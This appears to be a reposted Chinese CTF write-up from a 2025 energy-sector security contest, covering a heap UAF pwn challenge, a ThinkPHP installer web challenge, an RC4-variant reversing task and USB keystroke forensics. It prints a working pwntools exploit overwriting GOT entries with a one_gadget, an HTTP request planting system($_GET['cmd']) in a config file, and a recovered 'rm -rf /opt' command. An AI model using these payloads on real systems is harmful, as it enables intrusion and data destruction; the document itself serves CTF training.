2025年能源网络安全大赛社会组部分wp

admin

138876
文章

114
评论

2025年4月19日00:26:34评论11 views字数 8499阅读28分19秒阅读模式

pwn

pwn_milk

UAF的堆题目，只能编辑和释放前五个堆块，没有show函数可以leak，且没给libc版本。

注意到题目没开地址随机化，而且GOT表可以写，所以我们可以利用UAF对tcache来做一个任意地址读写，把存储堆信息的地址申请下来，然后在前五个地址里写上free函数got和其他got表项，然后把free函数写成题目的输出函数，再free有其他got表项的地址，就可以泄露出来libc地址，查到是2.31的libc，然后直接往free的got写one_gadget：

from pwn import *p = process("./pwn")p = remote("47.111.113.2", 22860)defadd(size):    p.sendlineafter(b">> ", b"1")    p.sendlineafter(b"Size: ", str(size).encode())defedit(idx, content):    p.sendlineafter(b">> ", b"2")    p.sendlineafter(b"Idx:", str(idx).encode())    p.sendlineafter(b"Content: ", content)deffree(idx):    p.sendlineafter(b">> ", b"3")    p.sendlineafter(b"Idx:", str(idx).encode())print_func = 0x4012B1free_got = 0x0000004034e0malloc_got = 0x000000403518alarm_got = 0x000000403508atol_got = 0x000000403528list_addr = 0x403580# context.log_level = 'debug'add(0x38)add(0x38)free(1)free(0)edit(0, p64(list_addr))add(0x38)add(0x38)edit(1, p64(free_got) + p64(alarm_got) + p64(atol_got) + p64(list_addr))edit(0, p64(print_func))free(1)alarm_addr = u64(p.recvuntil(b'1.')[:-2].ljust(8, b'x00'))success(f"alarm: {hex(alarm_addr)}")free(2)atol_got = u64(p.recvuntil(b'1.')[:-2].ljust(8, b'x00'))success(f"atol: {hex(atol_got)}")libc = alarm_addr - 0x0e2d90success(f"libc: {hex(libc)}")one_gadget = libc + 0xe3b01edit(0, p64(one_gadget))free(0)p.interactive()

web

EasyInstall

thinkphp框架，打开是一个安装，审计安装代码发现如下函数：

/** * 写入配置文件 * @param  array $config 配置信息 */functionwrite_config($config, $auth){if (is_array($config)) {//读取配置内容$conf = file_get_contents(MODULE_PATH . 'Data/db.tpl');//替换配置项foreach ($configas$name => $value) {$conf = str_replace("[{$name}]", $value, $conf);        }$conf = str_replace('[AUTH_KEY]', $auth, $conf);//写入应用配置文件if (!IS_WRITE) {return'由于您的环境不可写，请复制下面的配置文件内容覆盖到相关的配置文件，然后再登录后台。<p>' . realpath('') . './Modules/Common/Conf/db.php</p>            <textarea name="" style="width:650px;height:185px">' . $conf . '</textarea>';        } else {$filename = './Modules/Common/Conf/'.md5($_SERVER["REMOTE_ADDR"]).'.php';if (file_put_contents($filename, $conf)) {chmod($filename, 0777);show_msg("配置文件 $filename 写入成功");            } else {show_msg('配置文件写入失败！', 'error');session('error', true);            }return'';        }    }}

会写一个配置文件，内容可控：

<?phpreturnarray('DB_TYPE'   => '[DB_TYPE]', // 数据库类型'DB_HOST'   => '[DB_HOST]', // 服务器地址'DB_NAME'   => '[DB_NAME]', // 数据库名'DB_USER'   => '[DB_USER]', // 用户名'DB_PWD'    => '[DB_PWD]',  // 密码'DB_PORT'   => '[DB_PORT]', // 端口'DB_PREFIX' => '[DB_PREFIX]', // 数据库表前缀);?>

尝试注入到数据库表前缀，构造','DB_TYPE'=>system($_GET["cmd"]),);?>：

POST /install.php?s=/Install/step2.html HTTP/1.1Host: 121.43.235.216:28139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=bfdf95b17528cbbde374a47d2a6a2d1c; foo_db_config=think%3A%7B%22DB_PREFIX%22%3A%22%2527%252C%2529%253Bsystem%2528%2524_GET%255B%2522a%2522%255D%2529%253B%253F%253E%22%2C%22DB_PORT%22%3A%223306%22%2C%22DB_PWD%22%3A%221%22%2C%22DB_USER%22%3A%221%22%2C%22DB_NAME%22%3A%221%22%2C%22DB_HOST%22%3A%22127.0.0.1%22%2C%22DB_TYPE%22%3A%22mysqli%22%7DContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1Referer: http://121.43.235.216:28139/install.php?s=/install/step2.htmlCache-Control: max-age=0Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Origin: http://121.43.235.216:28139Content-Length: 242db%5B%5D=mysqli&db%5B%5D=127.0.0.1&db%5B%5D=1&db%5B%5D=1&db%5B%5D=1&db%5B%5D=3306&db%5B%5D=+%27%2C%27DB_TYPE%27%3D%3Esystem%28%24_GET%5B%22cmd%22%5D%29%2C%29%3B%3F%3E&admin%5B%5D=admin&admin%5B%5D=1&admin%5B%5D=1&admin%5B%5D=admin%40admin.com

访问后执行命令，找到suid程序/readflag：

这网页怪怪的

审计代码：

<?phpinclude("flaaaaaaag.php");highlight_file(__FILE__);$tmp1=$_POST['tmp1'];$tmp2=$_GET['tmp2'];$secret=289114;if(is_numeric($tmp1)){exit('Too early');}else{if($tmp1==$secret){include($tmp2);    }else{echo('you are close');    }} you are close

re

lava

linux64 upx壳，手动调试提取出key和密文，然后写出解密代码

__int64 sub_4020AC(){  v29 = __readfsqword(0x28u);  a3[0] = 0x7361457349346372LL;  a3[1] = 0xE9B979D03A640079LL;  n117 = 117;  n82 = 82;  n110 = 110;  v5 = -23;  v6 = -5;  n14 = 14;  n82_1 = 82;  n36 = 36;  n28 = 28;  v11 = -74;  n43 = 43;  v13 = -28;  v14 = -122;  v15 = -8;  n105 = 105;  n82_2 = 82;  n83 = 83;  n62 = 62;  n60 = 60;  v21 = -114;  v22 = -80;  n22 = 22;  n98 = 98;  v25 = -26;  v26 = -104;  n127 = 127;memset(a1, 0, 32);  sub_419DC0(aPlsInputTheFla);                  // "Pls input the flag"  sub_410F40(    (__int64)"%32s",                            // "%32s"    (constchar *)a1);  sub_401EE3((char *)a1, 0x20uLL, (__int64)a3, 9LL);if ( (unsignedint)sub_4010E0() )  {    sub_419DC0(aError);                         // "ERROR"    result = 0LL;  }else  {    sub_419DC0(aGreat);                         // "GREAT"    result = 1LL;  }if ( __readfsqword(0x28u) != v29 )    sub_4549B0();return result;}unsigned __int64 __fastcall sub_401EE3(char *a1, unsigned __int64 i_1, __int64 a3, __int64 n9LL){unsigned __int64 result; // raxchar v5; // [rsp+2Bh] [rbp-125h]int v6; // [rsp+2Ch] [rbp-124h]int v7; // [rsp+30h] [rbp-120h]unsigned __int64 i; // [rsp+38h] [rbp-118h]char v9[264]; // [rsp+40h] [rbp-110h] BYREFunsigned __int64 v10; // [rsp+148h] [rbp-8h]  v10 = __readfsqword(0x28u);  sub_401CF5(v9, a3, n9LL);  v6 = 0;  v7 = 0;for ( i = 0LL; i < i_1; ++i )  {    v6 = (v6 + 1) % 256;    v7 = (v7 + (unsigned __int8)v9[v6]) % 256;    v5 = v9[v6];    v9[v6] = v9[v7];    v9[v7] = v5;    a1[i] -= v9[(unsigned __int8)(v9[v6] + v9[v7])];  }  result = __readfsqword(0x28u) ^ v10;if ( result )    sub_4549B0();return result;}unsigned __int64 __fastcall sub_401CF5(char *a1, __int64 a2, unsigned __int64 n9LL){unsigned __int64 result; // raxchar v4; // [rsp+27h] [rbp-119h]int i; // [rsp+28h] [rbp-118h]int j; // [rsp+28h] [rbp-118h]int v7; // [rsp+2Ch] [rbp-114h]char buf[256]; // [rsp+30h] [rbp-110h] BYREFunsigned __int64 v9; // [rsp+138h] [rbp-8h]  v9 = __readfsqword(0x28u);  v7 = 0;memset(buf, 0, sizeof(buf));for ( i = 0; i <= 255; ++i )  {    a1[i] = i;    buf[i] = *(_BYTE *)(i % n9LL + a2);  }for ( j = 0; j <= 255; ++j )  {    v7 = (buf[j] + v7 + (unsigned __int8)a1[j]) % 256;    v4 = a1[j];    a1[j] = v4 + a1[v7];    a1[v7] += v4;  }  result = __readfsqword(0x28u) ^ v9;if ( result )    sub_4549B0();return result;}

defksa_variant(key: bytes) -> bytearray:"""Key scheduling algorithm (KSA) variant based on the C code provided."""    S = bytearray(range(256))    buf = bytearray((key[i % len(key)] for i inrange(256)))    v7 = 0for j inrange(256):        v7 = (buf[j] + v7 + S[j]) % 256        temp = S[j]        S[j] = (temp + S[v7]) % 256        S[v7] = (S[v7] + temp) % 256return Sdefrc4_variant_decrypt(ciphertext: bytes, key: bytes) -> bytes:"""Decrypt using the variant RC4 algorithm from C code."""    S = ksa_variant(key)    v6 = 0    v7 = 0    plaintext = bytearray(len(ciphertext))for i inrange(len(ciphertext)):        v6 = (v6 + 1) % 256        v7 = (v7 + S[v6]) % 256# swap        S[v6], S[v7] = S[v7], S[v6]        k = S[(S[v6] + S[v7]) % 256]# 解密：还原 a1[i] += k        plaintext[i] = (ciphertext[i] + k) % 256returnbytes(plaintext)# 示例：使用示例密文和密钥进行还原if __name__ == "__main__":    key = b"rc4IsEasy"    ciphertext = bytes([0x64, 0x3a, 0xd0, 0x79, 0xb9, 0xe9, 0x75, 0x52, 0x6E, 0xE9, 0xFB, 0x0E, 0x52, 0x24, 0x1C, 0xB6, 0x2B, 0xE4, 0x86, 0xF8, 0x69, 0x52, 0x53, 0x3E, 0x3C, 0x8E, 0xB0, 0x16, 0x62, 0xE6, 0x98, 0x7F])# 解密    plaintext = rc4_variant_decrypt(ciphertext, key)print("Decrypted:", plaintext.decode(errors='replace'))

加上flag提交：flag{2404c9b8af2dd18f92dd9018c85f76fe}

能源行业

usb

提取键盘流量，对照字典提取出命令是whoami && rm -rf /opt

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":""","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

原文始发于微信公众号（BeFun安全实验室）：2025年能源网络安全大赛社会组部分wp

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

2025年能源网络安全大赛社会组部分wp

pwn

pwn_milk

web

EasyInstall

这网页怪怪的

re

lava

能源行业

usb

第四届商师校赛-web（ak）

【buuctf】[极客大挑战]PHP

【WP】第四届SQCTF大赛Crypto方向题目全解

【WP】第四届SQCTF大赛Web方向题目全解

腾讯2025游戏安全PC方向初赛题解

2025腾讯游戏安全技术竞赛决赛题解

UKY 2025TGCTF WP

【buuctf】[极客大挑战]Http

隐写术之各类常见压缩包类型隐写总结

TexSAWCTF2025 writeup by Mini-Venom

发表评论

在线咨询

微信